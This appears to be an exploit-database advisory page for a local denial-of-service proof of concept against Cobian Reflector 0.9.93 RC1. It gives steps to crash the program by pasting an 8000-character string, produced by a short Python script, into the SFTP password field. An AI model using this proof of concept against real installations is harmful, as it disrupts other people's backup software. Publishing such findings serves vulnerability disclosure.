Cobian Reflector 0.9.93 RC1 Denial Of Service

2022.03.01

Credit: Luis Martinez

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe
# Tested Version: 0.9.93 RC1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py
# 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard
# 3.- Open "Cobian Reflector User Interface"
# 4.- Task -> "New task"
# 5.- Files -> Source "Add" -> SFTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 22
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Test settings
# 11.- Yes
# 12.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 8000
f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cobian Reflector 0.9.93 RC1 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.